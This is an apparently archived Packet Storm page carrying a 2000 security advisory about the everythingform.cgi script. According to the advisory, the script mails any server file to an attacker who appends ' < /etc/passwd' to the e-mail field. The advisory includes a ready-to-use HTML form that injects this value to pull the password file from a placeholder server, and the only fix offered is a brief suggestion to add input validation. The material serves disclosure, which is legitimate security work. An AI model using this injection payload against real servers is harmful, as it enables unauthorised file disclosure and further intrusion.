exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

everythingform.txt

everythingform.txt
Posted Aug 14, 2000
Authored by Signal 9

The Everything Form (everythingform.cgi) contains remote vulnerabilities which allow any file on the sytem to be read.

tags | exploit, remote, cgi, vulnerability
SHA-256 | 1b339106ce174c1887c0dbb63dc46ef3e2273e5d5d44fae56593ea21e2c22e12

everythingform.txt

Change Mirror Download
Content-Type: Remote Root via vulnerible CGI software
Date : 13/08/2000
Sender : s1gnal_9 <s1gnal-9@vs-solutions.com>
Subject : everythingform.cgi Vulnerible CGI
X-System : UNIX/NT systems running the everythingform.cgi CGI software
X-Status : s1gnal_9-ADVISORY-everythingform.txt
X-Greets : Narr0w, f0bic, VetesGirl
_________________________________________________________________________________


PRODUCT NAME: The EVERYTHING form [everythingform.cgi]

PRODUCT HOMEPAGE: http://www.conservatives.net/atheist/scripts/index.html?everythingform


DESCRIPTION :
It allows you to process an unlimited number of forms
using only one script; its feature's are simple, and flexible according the
the product homepage.
This is the replacement script for the previous scripts "flexform" and "flexform_mail".

PROBLEM:
When you submit the form, it responds back to the email address that you entered, saying
"thank you" or other data, when you put your email address in the form add " < /etc/passwd"
after your email address, and shortly you will have the /etc/passwd file in your mailbox.


EXAMPLE:
Below is a example of how we could get the /etc/passwd file off the remote system.

<-------------------------CUT HERE-------------------------------------->
<form action=http://www.SOMESERVER.com/everythingform.cgi method=POST>
<input type=hidden name=redirect value=done.html>
<input type=hidden name=output value=blah.htm>
<input type=hidden name=required value="Name|e-mail">
E-mail: <input type=text name="e-mail" value="myaddress@blah.com < /etc/passwd"><br>
<input type=submit value="Click me to get /etc/passwd"></form>
<-------------------------CUT HERE-------------------------------------->


SOLUTION
I would rewrite a portion of the script to do input validation checking.


Please visit www.zone.ee/unix :)

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close